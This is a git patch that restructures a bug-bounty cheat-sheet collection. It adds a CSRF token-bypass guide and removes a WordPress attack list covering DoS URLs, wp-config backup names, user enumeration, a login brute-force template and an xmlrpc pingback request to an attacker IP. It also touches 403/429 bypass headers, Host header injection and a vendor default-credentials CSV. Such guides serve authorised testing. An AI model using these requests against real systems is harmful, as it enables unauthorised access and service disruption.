From a2c07348e358f418ee2b88f7b39b5a653101c0be Mon Sep 17 00:00:00 2001 From: daffainfo Date: Wed, 15 Jun 2022 17:38:42 +0700 Subject: [PATCH] Update structure each readme --- ...File Upload.md => Arbitrary File Upload.md | 0 Business Logic Errors.md | 8 +- Bypass/Bypass 2FA.md | 6 +- Bypass/Bypass 304.md | 5 +- Bypass/Bypass 403.md | 13 +- Bypass/Bypass 429.md | 7 +- Bypass/Bypass CSRF.md | 120 + Bypass/Bypass Captcha.md | 1 + CMS/WordPress.md | 69 - Cross Site Request Forgery.md | 126 +- Cross Site Scripting.md | 9 +- Denial Of Service.md | 25 +- Exposed Source Code.md | 24 +- Framework/Zend.MD | 3 - Host Header Injection.md | 10 +- Insecure Direct Object References.md | 8 +- Misc/Account Takeover.md | 4 +- Misc/Broken Link Hijacking.md | 14 +- Misc/Default Credentials.csv | 2561 ----------------- Misc/Email Spoofing.md | 3 +- Misc/Exposed API keys.md | 17 +- Misc/JWT Vulnerabilities.md | 8 +- Misc/Mass Assignment.md | 8 +- Misc/Password Reset Flaws.md | 11 +- Misc/Tabnabbing.md | 8 +- NoSQL Injection.md | 12 +- OAuth Misconfiguration.md | 22 +- Open Redirect.md | 10 +- README.md | 13 +- Recon/Scope.md | 2 + Recon/Shodan Dorks.md | 2 +- .../laravel.md => Technologies/Laravel.md | 0 Technologies/Moodle.md | 4 +- Technologies/WordPress.md | 101 + Technologies/Zend.md | 13 + Web Cache Poisoning.md | 20 +- 36 files changed, 405 insertions(+), 2862 deletions(-) rename Bypass/Bypass File Upload.md => Arbitrary File Upload.md (100%) create mode 100644 Bypass/Bypass CSRF.md delete mode 100644 CMS/WordPress.md delete mode 100644 Framework/Zend.MD delete mode 100644 Misc/Default Credentials.csv rename Framework/laravel.md => Technologies/Laravel.md (100%) create mode 100644 Technologies/WordPress.md create mode 100644 Technologies/Zend.md diff --git a/Bypass/Bypass File Upload.md b/Arbitrary File Upload.md similarity index 100% rename from Bypass/Bypass File Upload.md rename to Arbitrary File Upload.md 
diff --git a/Business Logic Errors.md b/Business Logic Errors.md index e7e005f..9249590 100644 --- a/Business Logic Errors.md +++ b/Business Logic Errors.md @@ -1,9 +1,9 @@ # Business Logic Errors -## **Introduction** +## Introduction Business Logic Errors are ways of using the legitimate processing flow of an application in a way that results in a negative consequence to the organization. -## **How to Find** +## How to find 1. Review Functionality - Some applications have an option where verified reviews are marked with some tick or it's mentioned. Try to see if you can post a review as a Verified Reviewer without purchasing that product. - Some app provides you with an option to provide a rating on a scale of 1 to 5, try to go beyond/below the scale-like provide 0 or 6 or -ve. @@ -54,5 +54,5 @@ Business Logic Errors are ways of using the legitimate processing flow of an app - Add multiple fields or unexpected fields by abusing HTTP Parameter Pollution & Mass Assignment - Response Manipulation to bypass certain restrictions such as 2FA Bypass -Reference: -- [@harshbothra_](https://twitter.com/harshbothra_) \ No newline at end of file +## References +* [@harshbothra_](https://twitter.com/harshbothra_) \ No newline at end of file diff --git a/Bypass/Bypass 2FA.md b/Bypass/Bypass 2FA.md index f988b94..a274066 100644 --- a/Bypass/Bypass 2FA.md +++ b/Bypass/Bypass 2FA.md @@ -1,4 +1,4 @@ -# 2FA Bypass +# Bypass Two-Factor Authentication 1. Response manipulation @@ -90,4 +90,6 @@ Host: vuln.com code=null ``` -Source: [Harsh Bothra](https://twitter.com/harshbothra_) and other writeup \ No newline at end of file +## References +* [Harsh Bothra](https://twitter.com/harshbothra_) +* Other writeup \ No newline at end of file diff --git a/Bypass/Bypass 304.md b/Bypass/Bypass 304.md index c28ef0b..21b62cc 100644 --- a/Bypass/Bypass 304.md +++ b/Bypass/Bypass 304.md @@ -1,4 +1,4 @@ -# 304 Not Modified Bypass +# Bypass 304 (Not Modified) 1. Delete "If-None-Match" header ``` 
@@ -26,4 +26,5 @@ Host: target.com If-None-Match: W/"32-IuK7rSIJ92ka0c92kld" b ``` -Source: [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) +## References +* [https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521](https://anggigunawan17.medium.com/tips-bypass-etag-if-none-match-e1f0e650a521) diff --git a/Bypass/Bypass 403.md b/Bypass/Bypass 403.md index ba5efef..52e316e 100644 --- a/Bypass/Bypass 403.md +++ b/Bypass/Bypass 403.md @@ -1,11 +1,5 @@ -# 403 Forbidden Bypass +# Bypass 403 (Forbidden) -## Tools - -* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) - - -## Exploit 1. Using "X-Original-URL" header ``` GET /admin HTTP/1.1 @@ -67,6 +61,9 @@ Host: victim.com X­-Original-­URL: /admin ``` -Source: +## Tools +* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403) + +## References - [@iam_j0ker](https://twitter.com/iam_j0ker) - [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web) diff --git a/Bypass/Bypass 429.md b/Bypass/Bypass 429.md index be6f9f6..3444abc 100644 --- a/Bypass/Bypass 429.md +++ b/Bypass/Bypass 429.md @@ -1,4 +1,5 @@ -# 429 Rate limit Bypass +# Bypass 429 (Too Many Requests) + 1. Try add some custom header ``` X-Forwarded-For : 127.0.0.1 @@ -79,3 +80,7 @@ Host: target.com {"email":"victim@gmail.com "} ``` + +## References +* [Huzaifa Tahir](https://huzaifa-tahir.medium.com/methods-to-bypass-rate-limit-5185e6c67ecd) +* [Gupta Bless](https://gupta-bless.medium.com/rate-limiting-and-its-bypassing-5146743b16be) \ No newline at end of file diff --git a/Bypass/Bypass CSRF.md b/Bypass/Bypass CSRF.md new file mode 100644 index 0000000..2cc165f --- /dev/null +++ b/Bypass/Bypass CSRF.md 
@@ -0,0 +1,120 @@ +# Bypass CSRF + +1. Change single character +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab +``` + +2. Sending empty value of token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token= +``` + +3. Replace the token with same length +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaabaa +``` +4. Changing POST / GET method +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 +Host: target.com +[...] +``` + +5. Remove the token from request +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa +``` +Try this to bypass +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456 +``` + +6. Use another user's valid token +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=ANOTHER_VALID_TOKEN +``` + +7. Try to decrypt hash +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=MTIzNDU2 +``` +MTIzNDU2 => 123456 with base64 + +8. Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic +``` +POST /register HTTP/1.1 +Host: target.com +[...] 
+ +username=dapos&password=123456&token=vi802jg9f8akd9j123 +``` +When we register again, the request like this +``` +POST /register HTTP/1.1 +Host: target.com +[...] + +username=dapos&password=123456&token=vi802jg9f8akd9j124 +``` +If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part diff --git a/Bypass/Bypass Captcha.md b/Bypass/Bypass Captcha.md index 0c9d91b..29ed221 100644 --- a/Bypass/Bypass Captcha.md +++ b/Bypass/Bypass Captcha.md @@ -1,4 +1,5 @@ # Bypass Captcha + 1. Try changing the request method, for example POST to GET ``` POST / HTTP 1.1 diff --git a/CMS/WordPress.md b/CMS/WordPress.md deleted file mode 100644 index d5f9d74..0000000 --- a/CMS/WordPress.md +++ /dev/null 
@@ -1,69 +0,0 @@ -# WordPress Common Bugs - -1. Denial of Service via load-scripts.php -``` -http://target.com/wp-admin/load-scripts.php?load=react,react-dom,moment,lodash,wp-polyfill-fetch,wp-polyfill-formdata,wp-polyfill-node-contains,wp-polyfill-url,wp-polyfill-dom-rect,wp-polyfill-element-closest,wp-polyfill,wp-block-library,wp-edit-post,wp-i18n,wp-hooks,wp-api-fetch,wp-data,wp-date,editor,colorpicker,media,wplink,link,utils,common,wp-sanitize,sack,quicktags,clipboard,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-reply,json2,underscore,backbone,wp-util,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrate,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,esprima,jshint,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-bar,wp
link,wpdialogs,word-count,media-upload,hoverIntent,hoverintent-js,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embed,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,site-health,privacy-tools,updates,farbtastic,iris,wp-color-picker,dashboard,list-revisions,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter -``` - -2. Denial of Service via load-styles.php -``` -http://target.com/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit,revisions,media,themes,about,nav-menus,widgets,site-icon,l10n,install,wp-color-picker,customize-controls,customize-widgets,customize-nav-menus,customize-preview,ie,login,site-health,buttons,admin-bar,wp-auth-check,editor-buttons,media-views,wp-pointer,wp-jquery-ui-dialog,wp-block-library-theme,wp-edit-blocks,wp-block-editor,wp-block-library,wp-components,wp-edit-post,wp-editor,wp-format-library,wp-list-reusable-blocks,wp-nux,deprecated-media,farbtastic -``` - -3. Log files exposed -``` -http://target.com/wp-content/debug.log -``` - -4. Backup file wp-config exposed -``` -.wp-config.php.swp -wp-config.inc -wp-config.old -wp-config.txt -wp-config.html -wp-config.php.bak -wp-config.php.dist -wp-config.php.inc -wp-config.php.old -wp-config.php.save -wp-config.php.swp -wp-config.php.txt -wp-config.php.zip -wp-config.php.html -wp-config.php~ -``` - -5. 
Information disclosure wordpress username -``` -http://target.com/?author=1 -``` -``` -http://target.com/wp-json/wp/v2/users -http://target.com/?rest_route=/wp/v2/users -``` - -6. Bruteforce in wp-login.php -``` -POST /wp-login.php HTTP/1.1 -Host: target.com - -log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1 -``` - -7. XSPA in wordpress -``` -POST /xmlrpc.php HTTP/1.1 -Host: target.com - - -pingback.ping - -http://yourip:port - - -https://target.com> - - - -``` diff --git a/Cross Site Request Forgery.md b/Cross Site Request Forgery.md index c685c34..5726e5e 100644 --- a/Cross Site Request Forgery.md +++ b/Cross Site Request Forgery.md @@ -1,9 +1,9 @@ # Cross Site Request Forgery (CSRF) + ## Introduction Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated -## How to Find - +## How to exploit 1. HTML GET Method ```html 
@@ -37,124 +37,4 @@ xhr.withCredentials = true; xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8"); xhr.send('{"role":admin}'); -``` - -## Bypass CSRF Token -1. Change single character -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaab -``` - -2. Sending empty value of token -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token= -``` - -3. Replace the token with same length -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaabaa -``` -4. Changing POST / GET method -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -GET /register?username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa HTTP/1.1 -Host: target.com -[...] -``` - -5. Remove the token from request -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=aaaaaaaaaaaaaaaaaaaaaa -``` -Try this to bypass -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456 -``` - -6. Use another user's valid token -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=ANOTHER_VALID_TOKEN -``` - -7. Try to decrypt hash -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=MTIzNDU2 -``` -MTIzNDU2 => 123456 with base64 - -8. 
Sometimes anti-CSRF token is composed by 2 parts, one of them remains static while the others one dynamic -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=vi802jg9f8akd9j123 -``` -When we register again, the request like this -``` -POST /register HTTP/1.1 -Host: target.com -[...] - -username=dapos&password=123456&token=vi802jg9f8akd9j124 -``` -If you notice "vi802jg9f8akd9j" part of the token remain same, you just need to send with only static part +``` \ No newline at end of file diff --git a/Cross Site Scripting.md b/Cross Site Scripting.md index 1d29e70..8005eb4 100644 --- a/Cross Site Scripting.md +++ b/Cross Site Scripting.md @@ -1,6 +1,6 @@ # XSS Cheat Sheet (Basic) -## **Introduction** +## Introduction Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into websites. There is 3 types of XSS Attack: - Reflected XSS @@ -12,7 +12,7 @@ Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious s A type of XSS that has payloads found in the DOM rather than within the HTML code. -## **Payloads** +## **How to exploit** 1. Basic payload ```html @@ -381,5 +381,6 @@ Function("\x61\x6c\x65\x72\x74\x28\x31\x29")(); ``` -Reference: -- [Brute Logic](https://brutelogic.com.br/) \ No newline at end of file +## References +- [Brute Logic](https://brutelogic.com.br/) +- Some random twitter posts \ No newline at end of file diff --git a/Denial Of Service.md b/Denial Of Service.md index 0fcdafd..c75adda 100644 --- a/Denial Of Service.md +++ b/Denial Of Service.md 
@@ -1,27 +1,28 @@ # Denial of Service -## **Introduction** +## Introduction Denial of Service is a type of attack on a service that disrupts its normal function and prevents other users from accessing it -## **How to Find** +## How to FInd 1. Cookie bomb - ``` - https://target.com/index.php?param1=xxxxxxxxxxxxxx - ``` +``` +https://target.com/index.php?param1=xxxxxxxxxxxxxx +``` After input "xxxxxxxxxxxxxx" as a value of param1, check your cookies. If there is cookies the value is "xxxxxxxxxxxxxxxxxxxxxx" it means the website is vulnerable 2. Try input a very long payload to form. For example using very long password or using very long email - ``` - POST /Register - [...] +``` +POST /Register HTTP/1.1 +Host: target.com +[...] - username=victim&password=aaaaaaaaaaaaaaa - ``` +username=victim&password=aaaaaaaaaaaaaaa +``` 3. Pixel flood, using image with a huge pixels -Download the payload: [Here](https://hackerone-us-west-2-production-attachments.s3.us-west-2.amazonaws.com/000/000/128/5f5a974e5f67ab7a11d2d92bd40f8997969f2f17/lottapixel.jpg?response-content-disposition=attachment%3B%20filename%3D%22lottapixel.jpg%22%3B%20filename%2A%3DUTF-8%27%27lottapixel.jpg&response-content-type=image%2Fjpeg&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=ASIAQGK6FURQYFO7EZHL%2F20200910%2Fus-west-2%2Fs3%2Faws4_request&X-Amz-Date=20200910T110133Z&X-Amz-Expires=3600&X-Amz-SignedHeaders=host&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEFIaCXVzLXdlc3QtMiJGMEQCIGgY3dUtffr4V%2BoxTJaFxc%2F7qjRodT3XLyN1ZLEF8%2FhfAiAXklx1Zvy3iKIGm1bocpDUP1cTx46eTbsDOKqRC93fgyq0AwhbEAEaDDAxMzYxOTI3NDg0OSIMH9s8JiCh%2B%2FNADeibKpEDocuqfbmxkM5H5iKsA3K4RuwcxVT9ORLJrjJO%2FILAm%2BcNsQXTgId%2Bpw1KOLkbFKrq0BQIC6459JtfWqHPXvDC7ZJGboQ%2FXE0F%2BAZQa6jaEyldrkKuDewNy5jy3VX1gquS%2BWrGl%2BGhwmXB4cg1jgOugGUsC%2FxD%2BcragIJAtGA7lp3YdcL%2FiQbnvuzmLP8w%2FyCHPUrpOw94bPOk8fpetOJoLmDfXZdL3hLGBEUGS7dSOoyebLSXGZDctkSpnXCq383lWYWYn0LSv1ooVvuCVzgxE%2BZi4b4QvLjjMG3FJdEX%2BDYmnDvnSrRoDtyj8bD3cP3xbZ3jaNYRbIlQTm2zR1DgoaDGE74FmpZWHcyC8zK0V6AKG
6OzkcIaGRnGdDNSpZkN0DrWE7uY6BLiIGY16rflYOaElnbxijoMNDsU3MZH8gGk7crYJ%2FCeHeayInPBDgiREBgn7orAIjOY3xg8vzwKO96a90LmkK7wk977TbKfLIng1iNP9EMKYDjGePdBYDML9zBeqhO5LrVH%2BfbwzG5GXi0w5fnn%2BgU67AFRBwMChVRr%2FLW4j0PqpXUeN5ysVIuagoqSwqOhfwI9rtk56zTuGhO3du4raY5SOQ9vSkRdYHhga%2BW7oQTByD1ISiSaOjHs1s%2FrNfvIfMA8r0drPSykOdCuV2A5NhBpEPpT%2BuOosogdPihcORhO3hbcQJ9y4uxBsaBSJr%2F8S2CGjwZw7SOGmNaNFsPu%2BMRbYDA%2FH2eUMBl96w6KpUuNAXEPUcfq3weRMP1vXW62S4OyniYJ6DEVRkkE4eFZMUqy4c94uwSAegK54Po0V0sPM%2FncTESCgBf7Qe2zZlPhdRGZR%2F25cF6JTH0t2VIRQw%3D%3D&X-Amz-Signature=a837cb6b26bf437fa5008695310a21788918081c36e745d286c5cba9fd4a78e0) +Download the payload: [Here](https://daffa.tech/lottapixel3.jpg) 4. Frame flood, using GIF with a huge frame @@ -112,7 +113,7 @@ Accept-Encoding: gzip, gzip, deflate, br, br ![Response DoS](https://portswigger.net/cms/images/6f/83/45a1a9f841b9-article-screen_shot_2018-09-13_at_11.08.12.png) -References: +## References - [Hackerone #840598](https://hackerone.com/reports/840598) - [Hackerone #105363](https://hackerone.com/reports/105363) - [Hackerone #390](https://hackerone.com/reports/390) diff --git a/Exposed Source Code.md b/Exposed Source Code.md index 7748340..2360b4c 100644 --- a/Exposed Source Code.md +++ b/Exposed Source Code.md 
@@ -1,42 +1,58 @@ # Exposed Source Code -## **Introduction** +## Introduction Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application. -## **How to Find** +## How to FInd 1. Exposed Git folder ``` https://site.com/.git ``` ![GIT folder](https://1.bp.blogspot.com/-wTZOuULaqNw/XliI9jS0w3I/AAAAAAAAATA/VZxs7VL5PCY8FdnoKaEjS6AWpcjoJz4MgCLcBGAsYHQ/s1600/1.png) +Tools to dump .git +* https://github.com/arthaud/git-dumper + 2. Exposed Subversion folder ``` https://site.com/.svn ``` ![SVN folder](https://1.bp.blogspot.com/-5bC_EhFShgk/XliJqiw8pJI/AAAAAAAAATI/2HhrX0Ea3MwQ60Ax2tzNprNvulggPrZAACLcBGAsYHQ/s1600/1.png) +Tools to dump .svn +* https://github.com/anantshri/svn-extractor + 3. Exposed Mercurial folder ``` https://site.com/.hg ``` ![HG folder](https://1.bp.blogspot.com/-4FaqUeTlv4k/XliKHBOpgmI/AAAAAAAAATQ/sLdwhvSF-Jgn0WF5P-PouLp6uTeHUAOWACLcBGAsYHQ/s1600/1.png) +Tools to dump .hg +* https://github.com/arthaud/hg-dumper + 4. Exposed Bazaar folder ``` http://target.com/.bzr ``` ![BZR folder](https://1.bp.blogspot.com/-67WO_kL_iB8/XliKl1jggAI/AAAAAAAAATc/mWBw7igq05EdKR3JZmbXYN4LqjpBOrESgCLcBGAsYHQ/s1600/1.png) +Tools to dump .bzr +* https://github.com/shpik-kr/bzr_dumper + 5. Exposed Darcs folder ``` http://target.com/_darcs ``` +Tools to dump _darcs (Not found) + 6. Exposed Bitkeeper folder ``` http://target.com/Bitkeeper ``` -Reference: -- [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) +Tools to dump BitKeeper (Not found) + +## Reference +* [NakanoSec (my own post)](https://www.nakanosec.com/2020/02/exposed-source-code-pada-website.html) diff --git a/Framework/Zend.MD b/Framework/Zend.MD deleted file mode 100644 index 0f9f732..0000000 --- a/Framework/Zend.MD +++ /dev/null 
@@ -1,3 +0,0 @@ -# Common bug in Zend framework -1. Exposed config files -* Full Path Exploit : http://target.com//application/configs/application.ini diff --git a/Host Header Injection.md b/Host Header Injection.md index 1516af5..d224674 100644 --- a/Host Header Injection.md +++ b/Host Header Injection.md @@ -1,10 +1,9 @@ # Host Header Injection -## **Introduction** +## Introduction HTTP Host header attacks exploit vulnerable websites that handle the value of the Host header in an unsafe way. If the server implicitly trusts the Host header, and fails to validate or escape it properly, an attacker may be able to use this input to inject harmful payloads that manipulate server-side behavior. Attacks that involve injecting a payload directly into the Host header are often known as "Host header injection" attacks. -## **How to Find** - +## How to exploit 1. Change the host header ``` GET /index.php HTTP/1.1 @@ -47,5 +46,6 @@ GET https://vulnerable-website.com/ HTTP/1.1 Host: evil-website.com ... ``` -Reference: -- [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) + +## References +* [PortSwigger](https://portswigger.net/web-security/host-header/exploiting) diff --git a/Insecure Direct Object References.md b/Insecure Direct Object References.md index b956c1c..8e4b3ca 100644 --- a/Insecure Direct Object References.md +++ b/Insecure Direct Object References.md @@ -1,9 +1,9 @@ # Insecure Direct Object Reference (IDOR) -## **Introduction** +## Introduction IDOR stands for Insecure Direct Object Reference is a security vulnerability in which a user is able to access and make changes to data of any other user present in the system. -## **How to Find** +## How to FInd 1. Add parameters onto the endpoints for example, if there was ``` GET /api/v1/getuser 
@@ -152,5 +152,5 @@ GET /api/users/* 16. Try google dorking to find new endpoint -Reference: -- [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup +## References +* [@swaysThinking](https://twitter.com/swaysThinking) and other medium writeup diff --git a/Misc/Account Takeover.md b/Misc/Account Takeover.md index e5fa507..38977b1 100644 --- a/Misc/Account Takeover.md +++ b/Misc/Account Takeover.md @@ -1,9 +1,9 @@ # Account Takeover -## **Introduction** +## Introduction Account Takeover (known as ATO) is a type of identity theft where a bad actor gains unauthorized access to an account belonging to someone else. -## **How to Find** +## How to exploit 1. Using OAuth Misconfiguration - Victim has a account in evil.com - Attacker creates an account on evil.com using OAuth. For example the attacker have a facebook with a registered victim email diff --git a/Misc/Broken Link Hijacking.md b/Misc/Broken Link Hijacking.md index 3dcedca..901d986 100644 --- a/Misc/Broken Link Hijacking.md +++ b/Misc/Broken Link Hijacking.md 
@@ -1,16 +1,16 @@ # Broken Link Hijacking -## Tools -- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) - -## Definition +## Introduction Broken Link Hijacking exists whenever a target links to an expired domain or page ## How to find 1. Manually find external links on the target site (For example, check some links to social media accounts) 2. Try using tools to find broken link, for example using tools that listed in this readme -References: -- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) +## Tools +- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) -- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) \ No newline at end of file +## References +- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/) +- [How I was able to takeover the company’s LinkedIn Page](https://medium.com/@bathinivijaysimhareddy/how-i-takeover-the-companys-linkedin-page-790c9ed2b04d) +- [Hackerone #1466889](https://hackerone.com/reports/1466889) \ No newline at end of file diff --git a/Misc/Default Credentials.csv b/Misc/Default Credentials.csv deleted file mode 100644 index afb456f..0000000 --- a/Misc/Default Credentials.csv +++ /dev/null 
@@ -1,2561 +0,0 @@ -Vendor,Model/Software name,Version,Access Type,Username,Password,Privileges,Notes -155,CoreBuilder,2500,Telnet,,admin,, -155,CoreBuilder,2500,Telnet,debug,synnet,, -155,CoreBuilder,2500,Telnet,tech,tech,, -2Wire Inc.,Wireless Routers,,,http,,Administrator, -2Wire,WiFi routers,,HTTP,,Wireless,Admin,Almost all 2wire routers -360 Systems,Image Server 2000,,,factory,factory,, -3COM,,,Telnet,adm,,, -3COM,,,Telnet,admin,synnet,, -3COM,,,Telnet,manager,manager,, -3COM,,,Telnet,monitor,monitor,, -3COM,,,Telnet,read,synnet,, -3COM,,,Telnet,security,security,, -3COM,,,Telnet,write,synnet,, -3COM,,1.25,,root,letmein,, -3COM,11g Cable/DSL Gateway,,,,,, -3COM,3C16405,,Multi,admin,,Admin, -3COM,3C16406,,Multi,admin,,Admin, -3COM,3C16450,,Multi,admin,,Admin, -3COM,3CRADSL72,1.2,Multi,,1234admin,Admin, -3COM,3CRWE52196,,,,admin,Administrator, -3COM,3Com SuperStack 3 Switch 3300XM,,,security,security,Admin, -3COM,3Com SuperStack 3,,,security,security,Admin, -3COM,3c16405,,Console,Administrator,,Admin, -3COM,AccessBuilder,7000 BRI,SNMP,SNMPWrite,private,Admin, -3COM,AirConnect AP,,SNMP,,comcomcom,, -3COM,AirConnect Access,01.50-01,Multi,,,Admin, -3COM,CB9000/4007,3,Console,FORCE,,Admin, -3COM,CellPlex,,HTTP,admin,synnet,Admin, -3COM,CellPlex,7000,Telnet,,,Admin, -3COM,CellPlex,7000,Telnet,admin,,Admin, -3COM,CellPlex,7000,Telnet,admin,admin,Admin, -3COM,CellPlex,7000,Telnet,root,,Admin, -3COM,CellPlex,7000,Telnet,tech,,Admin, -3COM,CellPlex,7000,Telnet,tech,tech,User, -3COM,CoreBuilder,7000,Telnet,operator,admin,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,SNMP,SNMPWrite,private,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,,,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,,admin,Admin, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,debug,synnet,, -3COM,CoreBuilder,7000/6000/3500/2500,Telnet,tech,tech,, -3COM,HiPerACT,v4.1.x,Telnet,admin,,Admin, -3COM,HiPerARC,v4.1.x,Telnet,adm,,, -3COM,HiPerARC,v4.1.x,Telnet,adm,,Admin, -3COM,Internet 
